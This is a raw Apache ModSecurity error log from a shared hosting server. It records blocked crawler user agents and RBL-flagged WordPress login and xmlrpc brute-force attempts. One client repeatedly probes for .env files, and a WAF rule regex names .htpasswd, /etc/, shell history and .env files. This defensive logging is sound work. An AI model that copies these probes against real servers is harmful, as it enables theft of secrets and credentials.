[Tue May 26 14:08:02.949923 2026] [security2:error] [pid 585807:tid 586035] [client 185.191.171.16:20708] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVb6uHp6I37JgAKrHUIEAAAAOY"]
[Tue May 26 14:08:02.950070 2026] [security2:error] [pid 585807:tid 586035] [client 185.191.171.16:20708] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVb6uHp6I37JgAKrHUIEAAAAOY"]
[Tue May 26 14:08:03.182432 2026] [security2:error] [pid 585807:tid 586017] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb6uHp6I37JgAKrHUICQAAANQ"]
[Tue May 26 14:08:03.349041 2026] [security2:error] [pid 585807:tid 585959] [client 95.70.131.179:63882] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVb6-Hp6I37JgAKrHUIIQAAAJo"]
[Tue May 26 14:08:03.349515 2026] [security2:error] [pid 585807:tid 585959] [client 95.70.131.179:63882] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubbanquet.com"] [uri "/xmlrpc.php"] [unique_id "ahVb6-Hp6I37JgAKrHUIIQAAAJo"]
[Tue May 26 14:08:05.225964 2026] [security2:error] [pid 585807:tid 586004] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb7OHp6I37JgAKrHUISQAAAMc"]
[Tue May 26 14:08:05.768887 2026] [security2:error] [pid 585807:tid 585953] [client 185.191.171.9:63054] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVb7eHp6I37JgAKrHUIYwAAAJU"]
[Tue May 26 14:08:05.769044 2026] [security2:error] [pid 585807:tid 585953] [client 185.191.171.9:63054] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/robots.txt"] [unique_id "ahVb7eHp6I37JgAKrHUIYwAAAJU"]
[Tue May 26 14:08:07.483947 2026] [security2:error] [pid 585807:tid 586028] [client 202.141.30.10:35578] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVb7-Hp6I37JgAKrHUInQAAAN8"]
[Tue May 26 14:08:07.484083 2026] [security2:error] [pid 585807:tid 586028] [client 202.141.30.10:35578] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVb7-Hp6I37JgAKrHUInQAAAN8"]
[Tue May 26 14:08:07.752605 2026] [security2:error] [pid 585807:tid 585878] [remote 95.70.131.179:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVb7-Hp6I37JgAKrHUIpAAA7EY"]
[Tue May 26 14:08:07.752845 2026] [security2:error] [pid 585807:tid 586042] [client 95.70.131.179:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVb7-Hp6I37JgAKrHUIpAAA7EY"]
[Tue May 26 14:08:08.023725 2026] [security2:error] [pid 585807:tid 586058] [client 114.119.139.115:21151] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVb8OHp6I37JgAKrHUItAAAAPw"], referer: http://glorodavionics.com/index.php?route=information/sitemap
[Tue May 26 14:08:08.556943 2026] [security2:error] [pid 585807:tid 585955] [client 57.141.2.71:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb8OHp6I37JgAKrHUIvAAAAJc"]
[Tue May 26 14:08:09.498714 2026] [security2:error] [pid 585807:tid 585969] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb8eHp6I37JgAKrHUI2wAAAKQ"]
[Tue May 26 14:08:11.716051 2026] [security2:error] [pid 585807:tid 585979] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb8-Hp6I37JgAKrHUJEwAAAK4"]
[Tue May 26 14:08:13.096881 2026] [security2:error] [pid 585807:tid 585987] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb9OHp6I37JgAKrHUJLgAAALY"]
[Tue May 26 14:08:14.871115 2026] [security2:error] [pid 585807:tid 585988] [client 123.16.149.157:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb9uHp6I37JgAKrHUJYQAAALc"]
[Tue May 26 14:08:15.996879 2026] [security2:error] [pid 585807:tid 585951] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb9-Hp6I37JgAKrHUJewAAAJM"]
[Tue May 26 14:08:16.728675 2026] [security2:error] [pid 585807:tid 586040] [client 95.70.131.179:63625] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 179.131.70.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVb-OHp6I37JgAKrHUJlQAAAOo"]
[Tue May 26 14:08:16.728826 2026] [security2:error] [pid 585807:tid 586040] [client 95.70.131.179:63625] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kingsclubmembership.com"] [uri "/xmlrpc.php"] [unique_id "ahVb-OHp6I37JgAKrHUJlQAAAOo"]
[Tue May 26 14:08:17.792383 2026] [security2:error] [pid 585807:tid 586048] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb-eHp6I37JgAKrHUJqgAAAPI"]
[Tue May 26 14:08:18.408210 2026] [security2:error] [pid 585807:tid 585993] [client 202.141.30.10:65492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVb-uHp6I37JgAKrHUJzwAAALw"]
[Tue May 26 14:08:18.408325 2026] [security2:error] [pid 585807:tid 585993] [client 202.141.30.10:65492] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVb-uHp6I37JgAKrHUJzwAAALw"]
[Tue May 26 14:08:18.798111 2026] [security2:error] [pid 585807:tid 585896] [remote 111.229.141.137:36910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.141.229.111.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/wp-login.php"] [unique_id "ahVb-uHp6I37JgAKrHUJ1gAA2lg"]
[Tue May 26 14:08:19.157508 2026] [security2:error] [pid 585807:tid 586030] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb-uHp6I37JgAKrHUJ2gAAAOE"]
[Tue May 26 14:08:19.451991 2026] [security2:error] [pid 585807:tid 585913] [remote 54.36.102.244:48420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 244.102.36.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVb--Hp6I37JgAKrHUJ5gAAimk"]
[Tue May 26 14:08:19.498182 2026] [security2:error] [pid 585807:tid 585928] [remote 95.216.117.13:54306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVb--Hp6I37JgAKrHUJ5wAAxng"]
[Tue May 26 14:08:21.990213 2026] [security2:error] [pid 585807:tid 586045] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb_eHp6I37JgAKrHUKIQAAAO8"]
[Tue May 26 14:08:23.947975 2026] [security2:error] [pid 585807:tid 585984] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVb_-Hp6I37JgAKrHUKVQAAALM"]
[Tue May 26 14:08:25.936879 2026] [security2:error] [pid 585807:tid 586065] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcAeHp6I37JgAKrHUKkAAAAQM"]
[Tue May 26 14:08:27.831034 2026] [security2:error] [pid 585807:tid 585985] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcA-Hp6I37JgAKrHUKwgAAALQ"]
[Tue May 26 14:08:29.386798 2026] [security2:error] [pid 585807:tid 585953] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVcBOHp6I37JgAKrHUK6QAAAJU"]
[Tue May 26 14:08:29.512317 2026] [security2:error] [pid 585807:tid 585990] [client 202.141.30.10:65435] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcBeHp6I37JgAKrHUK_QAAALk"]
[Tue May 26 14:08:29.512492 2026] [security2:error] [pid 585807:tid 585990] [client 202.141.30.10:65435] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVcBeHp6I37JgAKrHUK_QAAALk"]
[Tue May 26 14:08:29.679368 2026] [core:error] [pid 585807:tid 586059] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.679386 2026] [core:error] [pid 585807:tid 586059] [client 208.84.100.152:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.855166 2026] [security2:error] [pid 585807:tid 585991] [client 208.84.100.152:56304] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.triviewsolutions.com"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahVcBeHp6I37JgAKrHULFwAAALo"]
[Tue May 26 14:08:29.856573 2026] [core:error] [pid 585807:tid 586025] [client 208.84.100.152:56388] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.856596 2026] [core:error] [pid 585807:tid 586025] [client 208.84.100.152:56388] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.857610 2026] [core:error] [pid 585807:tid 586014] [client 208.84.100.152:56374] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.857643 2026] [core:error] [pid 585807:tid 586014] [client 208.84.100.152:56374] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.857815 2026] [core:error] [pid 585807:tid 585967] [client 208.84.100.152:56372] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.857829 2026] [core:error] [pid 585807:tid 585967] [client 208.84.100.152:56372] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.857914 2026] [security2:error] [pid 585807:tid 585944] [client 208.84.100.152:56322] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.triviewsolutions.com"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVcBeHp6I37JgAKrHULIwAAAIw"]
[Tue May 26 14:08:29.858109 2026] [core:error] [pid 585807:tid 585993] [client 208.84.100.152:56358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.858125 2026] [core:error] [pid 585807:tid 585993] [client 208.84.100.152:56358] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.858159 2026] [core:error] [pid 585807:tid 585976] [client 208.84.100.152:56382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.858180 2026] [core:error] [pid 585807:tid 585976] [client 208.84.100.152:56382] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.858491 2026] [security2:error] [pid 585807:tid 585978] [client 208.84.100.152:56318] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.triviewsolutions.com"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahVcBeHp6I37JgAKrHULHgAAAK0"]
[Tue May 26 14:08:29.858590 2026] [core:error] [pid 585807:tid 585951] [client 208.84.100.152:56444] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.858603 2026] [core:error] [pid 585807:tid 585951] [client 208.84.100.152:56444] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.859547 2026] [security2:error] [pid 585807:tid 585988] [client 208.84.100.152:56276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.triviewsolutions.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVcBeHp6I37JgAKrHULGQAAALc"]
[Tue May 26 14:08:29.860117 2026] [core:error] [pid 585807:tid 585989] [client 208.84.100.152:56430] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.860130 2026] [core:error] [pid 585807:tid 585989] [client 208.84.100.152:56430] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.860217 2026] [core:error] [pid 585807:tid 586040] [client 208.84.100.152:56410] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.860231 2026] [core:error] [pid 585807:tid 586040] [client 208.84.100.152:56410] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.860445 2026] [core:error] [pid 585807:tid 585945] [client 208.84.100.152:56450] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.860452 2026] [core:error] [pid 585807:tid 586048] [client 208.84.100.152:56340] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.860467 2026] [core:error] [pid 585807:tid 585945] [client 208.84.100.152:56450] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.860478 2026] [core:error] [pid 585807:tid 586048] [client 208.84.100.152:56340] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.860964 2026] [core:error] [pid 585807:tid 585994] [client 208.84.100.152:56270] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.860978 2026] [core:error] [pid 585807:tid 585994] [client 208.84.100.152:56270] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.861661 2026] [core:error] [pid 585807:tid 586010] [client 208.84.100.152:56466] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.861674 2026] [core:error] [pid 585807:tid 586010] [client 208.84.100.152:56466] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.861979 2026] [core:error] [pid 585807:tid 586053] [client 208.84.100.152:56418] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.861994 2026] [core:error] [pid 585807:tid 586053] [client 208.84.100.152:56418] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.862906 2026] [core:error] [pid 585807:tid 586046] [client 208.84.100.152:56396] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.862909 2026] [core:error] [pid 585807:tid 586045] [client 208.84.100.152:56342] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.862921 2026] [core:error] [pid 585807:tid 586046] [client 208.84.100.152:56396] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.862928 2026] [core:error] [pid 585807:tid 586045] [client 208.84.100.152:56342] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.863616 2026] [core:error] [pid 585807:tid 585941] [client 208.84.100.152:56416] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.863650 2026] [core:error] [pid 585807:tid 585941] [client 208.84.100.152:56416] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.866936 2026] [core:error] [pid 585807:tid 585949] [client 208.84.100.152:56538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.866948 2026] [core:error] [pid 585807:tid 585949] [client 208.84.100.152:56538] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.876878 2026] [core:error] [pid 585807:tid 585942] [client 208.84.100.152:56524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.876900 2026] [core:error] [pid 585807:tid 585942] [client 208.84.100.152:56524] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 14:08:29.879874 2026] [core:error] [pid 585807:tid 586026] [client 208.84.100.152:56498] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
